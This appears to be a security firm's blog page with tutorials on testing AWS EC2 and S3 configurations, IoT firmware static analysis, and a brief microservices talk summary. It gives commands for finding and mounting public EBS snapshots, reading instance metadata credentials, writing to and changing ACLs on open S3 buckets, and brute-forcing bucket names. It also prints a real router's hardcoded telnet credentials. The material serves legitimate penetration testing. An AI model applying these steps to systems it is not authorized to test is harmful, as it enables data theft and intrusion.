Tuesday, September 18, 2018

A practical guide to testing the security of Amazon Web Services (Part 2: AWS EC2)

This is Part 2 of 3 on our practical guide to testing the security of Amazon Web Services. We are tackling the main services provided by Amazon for its cloud-based platform to support web applications and we started by discussing AWS S3 buckets and their security. You can get a little overview of AWS and catch up on important aspects of testing AWS S3 by reading our previous post.

In this second part, we describe another important AWS service used on a daily basis by many users: Elastic Compute Cloud or, more commonly, EC2.


Elastic Compute Cloud (EC2) is another widely used service offered by Amazon. It allows to rent virtual computers that can be used to run arbitrary applications. AWS EC2 provides a scalable solution to deploy a new computer, which in AWS terminology is called an "instance", and mange its status via a web-based user interface. The user can manage every aspect of an EC2 instance from the creation and execution to the definition of access policies. It's undeniable that AWS EC2 constitutes a powerful tool that, if not properly configured and protected, will inevitably result in a security breach. AWS EC2 instances provide many different features. In this post we discuss two features that are particular relevant when from a security perspective: Elastic Block Store and Instance Metadata Service.

AWS EC2 instances can benefit from other AWS services to which they are granted access to. A typical example, that we first introduced in Part 1 and we further explore here, is the synergy between AWS EC2 instances and AWS S3 buckets. When an AWS EC2 instance is created it requires, as all computers do, a persistent storage unit where you can save your data. Amazon thus provides Elastic Block Store (EBS) which is a block-level storage that provides a persistent storage solution that can be attached to an AWS EC2 instance. An EBS block thus constitutes an important part of an AWS EC2 instance as it allows to store data processed by the instance itself. Given its importance, it might be convenient to be able to take snapshots of an EBS block and store it safely so that, in the case of a failure, the AWS EC2 instance can be restored to a safe status. To accomplish this, Amazon gives the possibility of taking EBS snapshots and store them in its storage service AWS S3.

Let's now discuss another interesting feature that AWS EC2 instances have access to called Instance Metadata Service (IMS). IMS allows any AWS EC2 instance to retrieve data about the instance itself that can be used to configure or managing the running instance. The data available from the IMS ranges from the hostname of the instance to the initialization scrip that is executed upon running the instance. All this information can be retrieved only by the AWS EC2 instance by querying a specific API end-point located at
As will become clear in the remaining of this post, this end-point provides valuable information an attacker might use to compromise not only the AWS EC2 instance but other services as well. The documentation for the IMS, in fact, states the following:
Although you can only access instance metadata and user data from within the instance itself, the data is not protected by cryptographic methods. Anyone who can access the instance can view its metadata. Therefore, you should take suitable precautions to protect sensitive data (such as long-lived encryption keys). You should not store sensitive data, such as passwords, as user data.
IMS becomes thus a crucial aspects when analyzing the security of AWS EC2 instances.

Publicly accessible EC2 snapshots

As just mentioned, EBS snapshots are, by default, stored in a private AWS S3 bucket that is not directly accessible via the S3 dashboard. However, EBS snapshots are manageable via the AWS EC2 interface and their permissions can be change to be public. Needless to say, you should never do that.
From a security perspective, if you are doing a penetration testing activity and find yourself dealing with possibly open accessible EBS snapshots, you could try to have access to the EBS block by mounting it in an EC2 instance under your control. Think of an EBS block as a virtual disk that you can mount like you would normally do. To mount an EBS block you thus need two things:

  1. an AWS EC2 instance under your control where you can mount the EBS block
  2. the ID that identifies the snapshot

For (1) I recommend you check out the AWS documentation on how to create and launch an EC2 instance. While for (2) you can use the aws command to search for publicity accessible EBS snapshots follows:

aws --profile [PROFILE] ec2 describe-snapshots --filters [FILTERS] --region [REGION]

This command will respond with a JSON listing all the publicly available snapshots that satisfies the values specified by the --filters flag (for a complete description of the kind of filters you can use, check the documentation). The JSON will contain some information about the snapshot along with the corresponding SnapshotId value that we need. For example, let's assume that we want to list all the publicly accessible snapshots containing the word backup in it which are located in the east-us-2 region, this is what we would  do:

aws --profile default ec2 describe-snapshots --filters Name=description,Values="*backup*" --region east-us-2

The result of executing such command would be a JSON listing all the publicly accessible snapshots satisfying our search criteria.

    "Snapshots": [
            "Description": "Phoenix_competitor_analysis_backup_set",
            "Encrypted": false,
            "VolumeId": "vol-ffffffff",
            "State": "completed",
            "VolumeSize": 100,
            "StartTime": "2017-08-30T05:24:48.000Z",
            "Progress": "100%",
            "OwnerId": "234190327268",
            "SnapshotId": "snap-0dc716aaf28921496"
            "Description": "backup",
            "Encrypted": false,
            "VolumeId": "vol-0b21c8a6c158367fc",
            "State": "completed",
            "VolumeSize": 8,
            "StartTime": "2018-05-21T13:01:49.000Z",
            "Progress": "100%",
            "OwnerId": "388304843501",
            "SnapshotId": "snap-041c06c0c3658323c"
            "Description": "backup",
            "Encrypted": false,
            "VolumeId": "vol-0ee056a878d9dfdb1",
            "State": "completed",
            "VolumeSize": 30,
            "StartTime": "2018-01-07T13:52:56.000Z",
            "Progress": "100%",
            "OwnerId": "682345607706",
            "SnapshotId": "snap-0e793674b08737e95"
            "Description": "copy of backup sprerdda - BAckup-17-8-2018",
            "Encrypted": false,
            "VolumeId": "vol-ffffffff",
            "State": "completed",
            "VolumeSize": 30,
            "StartTime": "2018-08-22T15:03:48.179Z",
            "Progress": "100%",
            "OwnerId": "869858413856",
            "SnapshotId": "snap-02326682d84d3aedd"

Once you have identified the snapshot of your interest, you have to create an EBS volume from that snapshot in order to be able to mount it. The following command will do just that and create an EBS volume in your account.

aws  ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id [SNAPSHOT_ID]

Finally, from your AWS console, create an EC2 instance and mount the newly created EBS volume in it.

Metadata leakage 

At the beginning of this we discussed of a peculiar feature of AWS EC2 instances called Instance Metadata Service (IMS). Recall that IMS allows any AWS EC2 instance to retrieve data about the instance itself that can be used to configure or managing the running instance and is accessible from within the instance itself by querying the end-point located at
As already mentioned, many juice information can be retrieved from querying that end-point. The following table summarizes some of the most interesting one however, many more are available. The AMI ID used to launch the instance. If there is an IAM role associated it returns its name (which can be used in the next handler). If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role (for more information, see Retrieving Security Credentials from Instance Metadata). Otherwise, not present. Returns a user-defined script which is run every time a new EC2 instance is launched for the first time.

Usage example are described in the following:



 "Code" : "Success",
 "LastUpdated" : "2018-08-27T15:23:14Z",
 "Type" : "AWS-HMAC",
 "AccessKeyId" : "AS[REDACTED]TEM",
 "SecretAccessKey" : "EgKirlp[REDACTED]hkYp",
 "Token" : "FQoGZXIvYXdzEJH//////////wE[REDACTED]=",
 "Expiration" : "2018-08-27T21:36:24Z"

#!/bin/bash -xe
sudo apt-get update
# install coturn
apt-get install -y coturn
# install kms
sudo apt-get update
sudo apt-get install -y wget
echo "deb http://ubuntu.kurento.org xenial kms6" | sudo tee /etc/apt/sources.list.d/kurento.list
wget -O - http://ubuntu.kurento.org/kurento.gpg.key | sudo apt-key add -
sudo apt-get update
sudo apt-get install -y kurento-media-server-6.0
systemctl enable kurento-media-server-6.0
# enable coturn
sudo echo TURNSERVER_ENABLED=1 > /etc/default/coturn
# turn config file
sudo cat >/etc/turnserver.conf<<-EOF

sudo /usr/local/bin/cfn-signal -e $? --stack arn:aws:cloudformation:us-east-2:118366151276:stack/KurentoMinded/3cbb23a0-3d77-11e8-953d-503f3157b035 --resource WaitCondition --region us-east-2

To take advantage of such juice information, the attacker has to find a way to query from within the EC2 instance itself. There are many ways in which this can be accomplished from being able to find a Server Side Request Forgery (SSRF) vulnerability, or exploit a proxy setup on the EC2 instance all the way to DNS rebinding as described by Alexandre Kaskasoli.

Conclusion of Part 2

AWS EC2 is undeniably a powerful service that many companies are taking advantage of. As described above, the security of an AWS EC2 instance is crucial to keep a company safe from malicious attackers. This post wrapped up the main security issues related to AWS EC2 instances and how security experts can test the presence of such issues during an assessment.

Tuesday, September 11, 2018

A practical guide to testing the security of Amazon Web Services (Part 1: AWS S3)

Back in the days, the word Amazon used to refer to over half of earth's rainforests. While this is still true, it isn't what most people think of when they hear the word Amazon. Nowadays, people refer to the word Amazon as a place where they can order goods from the confort of their couches.  However, Amazon offers much more than just a online marketplace. In 2006, Amazon launched a subsidiary called Amazon Web Services (AWS) which is a platform that provides on-deman cloud computing for everyone. The adoption of AWS has grew considerably in the past years, more and more companies are now embracing AWS and deploying their web applications in the cloud offered by Amazon. But what does that mean from a security perspective?

In this series of posts, we discuss the main AWS services being used by web applications and how they can be tested from a security standpoint. We take into consideration the following services: S3, EC2, Cognito and CloudFront. For each service we give you a brief description of its usage and then an analysis of how to test the configuration of those services along with examples of possible attack scenarios.

A little overview

Amazon Web Services, simply known as AWS, offers many different cloud hosting services that companies can use when building their web applications. The wide range of services offered by Amazon can be very convenient for companies looking to outsource part (or the entirety) of their infrastructure as it provides robust and flexible solutions for building modern web applications.
Such variety of services have paved the way for new type of security considerations and new attack surfaces and, of course, when it comes to abusing AWS services the one culprit is misconfiguration.
A misconfigured service might allow unauthorized access to a resource that in turns might give access to other resources eventually spreading until the entire system has been compromised.


AWS S3 Buckets

Simple Storage Service (S3) is probably the most popular of the AWS services and provides a scalable solution for objects storage via web APIs. S3 buckets can be used for many different usage and in many different scenarios.

Consider the case of a web application that requires a place where to store content that is then served to users, S3 comes to the rescue. The image below depicts a scenario where a web application is making use of AWS S3 to store images uploaded by users and to further store content, such as JavaScript and CSS, used by the web application itself.

Moreover, S3 buckets can be used to store and serve static web sites by enabling the "Static website hosting" property. This property gives the possibility to store and serve only static content written in HTML, meaning that dynamic pages written in server-side code such as PHP or ASP, will not be executed.

S3 buckets can also be connected to other AWS services to provide support or enhance their features. Such synergy between S3 buckets and other AWS services inevitably results in many juice information being stored in buckets (as depicted in the picture below). For example, AWS EC2 instances' snapshots are stored in S3 buckets. As a result, a poorly configured S3 bucket will end up storing sensitive information contained in the EC2 instance possibly including, but not limited to, keys which grant access to other EC2 instances or services.

There's always a Pot of Gold at the Rainbow's End

AWS S3 buckets provide different access permissions which, if misconfigured and left open for unauthorized access, might result in many different attack scenarios. Over the past years, AWS S3 buckets have been come to be known as the primary source of leakage  when companies suffer from data breaches. No company is immune to AWS S3 buckets publicly open in the wild, and whenever a breach happens, they make their ways into major press headlines.

Booz Allen Hamilton, a U.S. defense contractor, left data publicly accessible through an insecurely configured S3 account containing files related to the National Geospatial-Intelligence Agency (NGA), which handles battlefield satellite and drone surveillance imagery.
Accenture, one of the biggest consulting agencies out there, left openly accessible AWS S3 buckets containing sensitive information including plain text passwords.
Verizon too was responsible, multiple times, of leaving misconfigured AWS S3 buckets which contained millions personal information of its customer.

Misconfigured AWS S3 buckets that leaves unauthorized access are thus abused by attackers in order to compromise the privacy of the data stored in those buckets, ultimately resulting in violating the privacy of million of users around the world.

Violation of users' privacy is not the only thing that can be achieved, being able to access S3 buckets might also provide an attacker with the knowledge he requires to access other AWS services.
If we consider a poorly configured S3 bucket that contains EC2 snapshots, then an attacker might be able to have access to those EC2 snapshots and retrieve security keys to the EC2 instance itself.
Furthermore, consider the case in which an AWS S3 bucket is used to store and serve JavaScript content to a web application. If the bucket is left misconfigured allowing an attacker to get writing access he might be able perform an attack that has been called "GhostRider". Quoting Sekhar Sarukkai, chief scientist at Skyhigh networks,
Bucket owners who store Javascript or other code should pay particular attention to this issue to ensure that 3rd parties don’t silently overwrite their code for drive-by attacks, bit-coin mining or other exploits. Even benign image or document content left open for overwriting can be exploited for steganography attacks or malware distribution.
It thus become crucial to be well aware of which AWS S3 buckets are configured and how to properly test the permissions on those buckets so to avoid misuse.

Get your hands dirty

The first step when testing the security of S3 buckets is to identify the location of the bucket itself, meaning the URL that can be used to interact with the bucket.
Note that S3 buckets have unique names, meaning that two different AWS users cannot have a bucket with the same name. This fact can be helpful when trying to guess the name of a bucket knowing the name of the web application.

Let's start by considering a bucket named mindeds3test.
The URLs schemas that can be used to interact with the bucket are:

Moreover, if the bucket has the property "Static website hosting", it provides access to static HTML pages via the following URL:

S3 bucket identification

As described above, the identification of a bucket boils down on identifying the URL that identifies the bucket. There are many different ways to do so.

HTML inspection

Let's start very easily and consider the HTML code of the web application under analysis. It might in fact happen that you might find S3 URLs directly in the HTML code, saving you the trouble of looking around for the buckets. Start by having a look at the HTML code and the resources loaded by the web page in order to identify S3 buckets.


A brute-force approach, possibly based on a wordlist of common words along with specific words coming from the domain you're testing, might also do the trick. For example, we can use the Burp Intruder to perform a series of request to the URL http://s3.amazonaws.com/[bucketname]. This URL does not identify a bucket however, it responds with a convenient PermanentRedirect message in case a bucket is found and a NoSuchBucket message otherwise.

In the intruder tab configure as target host http://s3.amazonaws.com, then move to position and setup a simple get request and put the payload position right after the / character of the request. Proceed to the Payloads section and load your wordlist, finally move to Options and in the Grep - Match panel add only a match for the word PermanentRedirect. This will help in identifying and sorting the result of the attack. Now press the Start attack button and the intruder will start performing requests and collecting results of possible buckets.

As shown in the picture above, our Grep - Match option cause the creation of an additional column in the result of the attack providing a convenient way to identify which payload corresponds to a valid AWS S3 bucket and which doesn't.

Google Dork

Google always comes to the rescue when it comes to search for URLs. You can in fact use the convenient Inurl directive to search for possibly interesting AWS S3 buckets. We report the following list of google docks that can be used to retrieve possibly juice AWS S3 buckets.

Inurl: s3.amazonaws.com/legacy/
Inurl: s3.amazonaws.com/uploads/
Inurl: s3.amazonaws.com/backup/
Inurl: s3.amazonaws.com/mp3/
Inurl: s3.amazonaws.com/movie/
Inurl: s3.amazonaws.com/video/
inurl: s3.amazonaws.com

Refer to https://it.toolbox.com/blogs/rmorril/google-hacking-amazon-web-services-cloud-front-and-s3-011613 more interesting Google dorks.

DNS Caching

There are many services out there maintaining some sort of DNS caching that can be queried by users. By taking advantage of such services it is possible to hunt down AWS S3 buckets.
Interesting services we recommend to check out are:

https://buckets.grayhatwarfare.com/ (created specifically to collect AWS S3 buckets)

The following is a screenshot from findsubdomains showing how easy it can be to retrieve AWS S3 buckets by searching for subdomains of s3.amazonaws.com

Bing reverse IP

Microsoft's Bing search engine can be very helpful in identifying AWS S3 buckets given its ability of searching for domains given an IP address. Given the IP address of a known AWS S3 bucket, just by taking advantage of the ip:[IP] feature of Bing, it is possible to retrieve many other AWS S3 buckets resolving to the same IP.

Testing permissions

Once an S3 bucket has been identified, it is time to test its access permissions and try to abuse them. An S3 bucket provides a set of five permissions that can be granted at the bucket level or at the object level.

At bucket level allows the to list the objects in the bucket.
At object level allows to read the content as well as the metadata of the object.

At bucket level allows to create, overwrite, and delete objects in the bucket.
At object level allows to edit the object itself.

At bucket level allows to read the bucket’s Access Control List.
At object level allows to read the object’s Access Control List.

At bucket level allows to set the Access Control List for the bucket.
At object level allows to set an Acess Control List for the object.

At bucket level is equivalent to granting the READWRITE, READ_ACP, and  WRITE_ACP permissions.
At the object  levelis equivalent to granting the READ,  WRITEREAD_ACP, and  WRITE_ACP.

Testing READ

Via HTTP, try to access the bucket by requesting the following URL

It is also possible to use the AWS command line and list the content of the bucket with the following command:
aws s3 ls s3://[bucketname] --no-sign-request

Note: the -no-sign-request flag specifies to not use credential to sign the request.

A bucket that allows to read its content will answer by providing a list of the content. The HTTP request will answer with an XML page while the command line request will answer with a list of files.

Testing WRITE

aws s3 cp localfile s3://[bucketname]/test-upload.txt --no-sign-request
A bucket that allows arbitrary file upload will answer with a message showing that the file has been uploaded

upload: Pictures/ec2-s3.png to s3://mindeds3test01/test-upload.txt

Testing READ_ACL

aws s3api get-bucket-acl --bucket [bucketname] --no-sign

ACL can also be specified for a single object and can be read with the following command:
aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request

Both commands will output a JSON describing the ACL policies for the resource being specified.


Via AWS command line:
aws s3api put-bucket-acl --bucket [bucketname] [ACLPERMISSIONS] --no-sign-request

ACL can also be specified for a single object and can be written with the following command:
aws s3api put-object-acl --bucket [bucketname] --key file.txt [ACLPERMISSIONS] --no-sign-request

Both commands do not display an output in case of operation successful.

Any authenticated AWS client

Finally, AWS S3 permissions used to include a peculiar grant named "any authenticated AWS client". This permission allows any AWS member, regardless of who they are, access to the bucket. This feature is not provided anymore but there are still buckets with this type of permission enabled.
To test for this type of permission, you should create an AWS account and configure it locally with the aws command line:

aws configure

You can then try to access the bucket with the same commands described above, the only difference is that the flag --no-sign-request should be replaces with --profile [PROFILENAME] where PROFILENAME is the name of the profile created with the configure command.

Conclusion of Part 1

AWS S3 buckets provides a convenient means of outsourcing storage resources and should thus not surprise that many companies decide to take advantage of such a service. The simplicity provided by AWS S3 for creating a bucket, overtime might result in a difficulty on keeping track of all the buckets. This post shows how to test publicly accessible AWS S3 buckets. Once a wrongly configured bucket is identified, the number one priority is to restrict its access only to authorized users.

Remember, you are one misconfigured S3 bucket away from becoming the next major press headline. 

Friday, September 7, 2018

Pentesting IoT devices (Part 1: Static Analysis)


Intelligent dishwashers, smart factories, connected sensors and Wi-Fi fridges, these are only a few examples of everyday objects that now are connected to the Internet.
All these "brainless" objects have been upgraded to become Internet of Things devices and now they’re changing our lifestyle communicating with us at anytime and in any place.
As security experts have to face the challenge of testing the security of these devices in order to find their vulnerabilities before bad guys do.
At the same time, it is also important to make manufacturers and organizations aware of the security risks associated with this kind of devices.

This article has been written to do a brief overview of the IoT testing approach that we use during our activities here in Minded Security.
It has to be noted that this article is not to be intended as a strict guide suitable for all situations but as a starting point for developing your own testing methodology and a good arsenal of tools suitable for the majority of IoT security assessments. Now, let's start with the fun.

Preliminary Analysis

The first thing to do in order to better understand an IoT device is to perform some preliminary analysis which consists in conducting the first recon on a new firmware we have never seen before.
The main goal here is to get an idea about the firmware architecture and if it is encrypted or not.

Firmware package will be analyzed and the file system will have to be unpacked and extracted.

This process can be summarized in the following steps:

  • Identify the target device: if you don’t know what device runs your firmware, additional analysis needs to be performed for example with an internet search.
  • Understand if a firmware is encrypted or compressed: 
    • use strings against the firmware, and if there are no strings in the output the file is probably obfuscated
    • launch hexdump with the “-C” argument which provides some context for the strings. 
    • use Radare with “izz” command to search for non-ASCII characters i.e. Unicode-encoded strings.
  • Identify firmware architecture and FS: Binwalk is useful to examine and extract binary files so launch it against the firmware without any argument in order to gain useful information about it.
  • Extract the Filesystem: once the filesystem type has been identified (i.e. Squashfs, Cramfs, YAFFS2 and so on) the next steps are:
    • extract it from the firmware 
    • mount it in order to access the data inside. According to the filesystem type of your device, it is possible to use different tools like dd, binwalk or fmk to extract the fylesystem.
Below it is provided an example of a preliminary analysis performed with binwalk and regarding the DLink WiFi Day & Night DCS‑932L camera firmware.

$ binwalk DCS-932L_fw_v108_b2.bin
106352        0x19F70         U-Boot version string, "U-Boot 1.1.3"
106816        0x1A140         CRC32 polynomial table, little endian
124544        0x1E680         HTML document header
124890        0x1E7DA         HTML document footer
124900        0x1E7E4         HTML document header
125092        0x1E8A4         HTML document footer
125260        0x1E94C         HTML document header
125953        0x1EC01         HTML document footer
327680        0x50000         uImage header, header size: 64 bytes, header CRC: 0x1457B432, created: 2014-02-11 05:50:43, image size: 3678347 bytes, Data Address: 0x80000000, Entry Point: 0x803B8000, data CRC: 0x6E80DDBC, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "Linux Kernel Image"
327744        0x50040         LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 6433659 bytes

As you can see from the tool output, there's a linux kernel inside a uImage at position 0x50000 and some LZMA compressed data at 0x50040 that could be the filesystem.
Let’s go ahead and unzip the firmware of the IPcamera with
binwalk -eM DCS-932L_fw_v108_b2.bin
command (the “-e” option extract the file and “-M” tells binwalk to perform the extraction recursively).

As a result you will see (inside /_DCS-932L_fw_v108_b2.bin.extracted/_50040.extracted folder) a file named 3DA000 that needs to be investigate further.
Using the command “file” it is possible to see that it is a cpio archive which contains a filesystem.

$ file 3DA000
3DA000: ASCII cpio archive (SVR4 with no CRC)

At this point it is possible to use the “cpio” command to extract the filesystem as shown below:

$ cpio -ivd --no-absolute-filenames -F 3DA000
cpio: Removing leading `/' from member names
[. . .]

Finally we can see and navigate through the firmware directories:

$ ls
bin  dev  etc  etc_ro  home  init  lib  media  mnt  mydlink  proc  sbin  sys  tmp  usr  var

Please note that, you can find the same files and folders if you look inside the /_DCS-932L_fw_v108_b2.bin.extracted/_50040.extracted/_3DA000.extracted/cpio-root folder because binwalk has already extracted them, but, for the sake of completeness, we preferred to show the use of “cpio” command to extract the files.

Now that we managed to correctly extract and access the filesystem, our interest is to find any kind of security-related issues or bad practices such as:

  • Hardcoded credentials
  • Weak credentials hash contained in files like /etc/passwd
  • Custom scripts or configuration files with any kind of sensitive information
  • Web pages or binary source files that could be vulnerable to code injection
  • Private keys 
  • Links and IP addresses that could expand the attack surface of the IoT device
A great list of IoT-related vulnerabilities as well as other examples of the previous mentioned tools usage, could be found under the OWASP IoT project at the following link:

Static Analysis

In the this section we are going to present three different methods to perform the static analysis of a filesystem:

  • the first one is a full “manual” research with a small piece of automation; 
  • then we will present a tool called firmwalker that aims to scrape through the files and extract useful information;
  • finally we are going to show a fully automated tool (FACT) that automatically extract and analyze a firmware.


As you can see from the following example, grepping for the keyword “admin” it is possible to notice a file, RT2860_default_novlan, that could be interesting to further analyze. 

$ grep -iR admin
[. . .]
[. . .]

In the snippet below we printed the configuration file with some juicy information:

$ cat RT2860_default_novlan
#The word of "Default" must not be removed
[. . .]


Firmwalker is a script that uses a list of different interesting files and keywords inside your firmware filesystem directory to help automating the research for point of interests.
The tool bases its search on many keywords divided in category such as: binaries, passfiles and so on (for more details you can find all the keywords listed inside the /data folder, as you can see from its github page).
The tool usage is very simple because you have to specify only the filesystem folder as input:

./firmwalker.sh /cpio-root

***Firmware Directory***
***Search for password files***
##################################### passwd
[. . .]

***Search for files***
##################################### *.conf

***Search for shell scripts***

##################################### shell scripts
-------------------- password --------------------
[. . .]
[. . .]

***Search for ip addresses***

##################################### ip addresses
[. . .]

As you can see it's easy to find some potentially sensitive files or scripts or other private data. You can also notice that firmwalker has found something interesting in RT2860_default_novlan file so it has listed that under the "password" category. This behavior is due to the fact that, like we made manually, firmwalker has identified the keyword "admin" inside the file and specifically it is listed in firmwalker data/patterns file, as you can see from the tool source code.

Note: dealing with firmwalker, you'll have to install shodan cli or comment out the code lines that handle that part since the tool exits if shodan cli is not installed. More information about this bug.

FACT: firmware extraction and static analysis

“The Firmware Analysis and Comparison Tool (formerly known as Fraunhofer's Firmware Analysis Framework (FAF)) is intended to automate most of the firmware analysis process. It unpacks arbitrary firmware files and processes several analysis. Additionally, it can compare several images or single files.”

If you need a fast and fully automated analysis this tool is what you are looking for. Without knowing anything about binwalk, firmwalker and so on it is possible to get the same results in terms of firmwares extraction and static analysis using FACT. Below we have listed the main features of this tool:

  • Easy to use thanks to the graphical web user interface
  • Fully automated process of extraction and static analysis
  • Expansible with custom plugins

In order to test FACT functionalities, we used the aforementioned Dlink firmware as input and we selected different analysis options, as shown in the below picture:

Different kind of tests that FACT can perform against a firmware

Once the analysis are over, it is possible to review the results through different sub-menus. For example, as you can see in the below images, FACT has provided: general information about the firmware, a binwalk analysis with also an entropy graph useful to show if a firmware is encrypted and the name of some firmware binaries.

General information about the analyzed firmware

Binwalk and entropy analysis results

Binaries found inside the firmware 
As a final consideration about this tool, we can say that: FACT allows a fast firmware analysis because all you have to do is feed it with a zip file containing the binaries and it will perform a complete static analysis through many tools.

Using the outputs to find vulnerabilities

To further investigate the aforementioned issue of the harcoded credentials, let's download from here the known-vulnerable Dlink-412 router firmware and manually analyze it in order to find some credentials left inside configuration files or custom scripts, which is usually a common problem in such kind of devices.

Once the filesystem is extracted through binwalk, it is possible to dig into it and search for possible misconfigured services like ssh or telnet that could allow a remote attacker to access the device. By using grep command with the "telnet" keyword, some interesting data can be quickly noticed.

$ grep -iR telnet
etc/init0.d/S80telnetd.sh: telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &
etc/init0.d/S80telnetd.sh: telnetd &
etc/init0.d/S80telnetd.sh: killall telnetd

At this point it is already clear that using grep we have found an interesting script, S80telnetd.sh, that manages the telnet service. Currently, by analyzing the whole etc/init0.d/S80telnetd.sh script you can notice that telnetd process is going to be started with an hardcoded credential set: Alphanetworks as username and the content of image_sign variable as password.

$ cat S80telnetd.sh 
echo [$0]: $1 ... > /dev/console
if [ "$1" = "start" ]; then
if [ -f "/usr/sbin/login" ]; then
image_sign=`cat /etc/config/image_sign`
telnetd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &
telnetd &
killall telnetd

In order to recover the password of the telnet service, we have to print the content of /etc/config/image_sign file.

$ cat ./config/image_sign

Finally we have discovered that the telnet server of the router is going to be executed with a preset of hardcoded credentials (Alphanetworks:wrgn28_dlob_dir412) and this misconfiguration represents a serious security concern because it could allow a malicious user (who knows this information) to easily break into the router.
It is interesting to notice that this kind of vulnerability can be found only by performing an effective manual code review and, tools such as firmwalker or FACT, can only help to identify interesting entry points (like the presence of a telnet service).


In this article on Pentesting IoT via static analysis we have shown a simple step by step guide to manually approach and analyze an unknown firmware. In particular we have discussed three different approaches to static firmware analysis (manual, automated and fully automated) through different practical examples. Lastly, we have highlighted how static analysis can be useful in finding a specific class of vulnerabilities.
The guide will continue in a second article, where we will deep dive into the dynamic analysis of the firmware.


  • https://reverseengineering.stackexchange.com/questions/15006/approach-to-extract-useful-information-from-binary-file
  • https://www.pentestpartners.com/security-blog/using-hexdump-analysis-for-firmware-extraction-a-how-to/
  • https://resources.infosecinstitute.com/firmware-analysis-for-iot-devices/
  • https://firmwaresecurity.com/
  • http://elinux.org/File_Systems
  • https://fkie-cad.github.io/FACT_core/

Monday, July 30, 2018

Microservices Security: Dos and Dont's


Last week we were invited as speakers by a very big enterprise for an internal event/conference and we decided to present an analysis of the most interesting issues on microservices we found in the last years during Minded Security activities.

More and more enterprises are restructuring their development teams to replicate the agility and innovation of startups.
In the last few years, microservices have gained popularity for their ability to provide modularity, scalability, high availability, as well as make it easier for smaller development teams to develop in an agile way. But how do they deal with security? what about security contexts? 
This talk will give insights about the most interesting issues found in the last years while testing the security of multilayered microservices solutions and how they were fixed.

Direct link to the presentation